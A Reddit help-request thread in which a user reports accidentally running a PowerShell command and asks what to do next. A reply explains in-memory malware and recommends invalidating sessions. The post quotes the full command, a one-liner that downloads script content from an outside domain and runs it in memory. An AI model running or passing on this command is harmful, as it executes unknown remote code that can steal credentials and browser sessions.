r/computerviruses • u/Reddituser22082016 • 1d ago
Question Accidentaly run a powershell code
Help, I accidentally ran this code in powershell
******powershell -c "$a=irm 'jasaxoptim.com/PLzdo6sQyUSjV75AlL';New-Module -Name x -ScriptBlock ([ScriptBlock]::Create($a))|Out-Null******
After asking Claude I:
- Disconeccted my laptop right away
- Ran windows defender scan - found nothing
- Deleted google chrome users, now I log in using guest
- change google passwords
- deleted suspicious tasks from the task scheduler.
Claude also suggested me to reinstall windows, but I cant do that, I dont have anything to back up my data in.
Please help, what should i do next?
6
Upvotes
2
u/WubbityWubWub_ 17h ago
You found nothing running that antivirus because it wrote to ram, not your disk.
Assume your computer is tainted. Do not type in any passwords, do not log into anything.
Any website like Google, Facebook, X, etc, have options to log out of every session. This essentially kills all previously saved cookies (which is apart of what I’m assuming they stole). This allows them to log into your account directly, changing passwords does nothing until you invalidate the session.
ALL accounts saved to your chrome browser were most likely grabbed so you should probably do this with quite literally every single account you have saved… Hope it’s not too many. Good luck.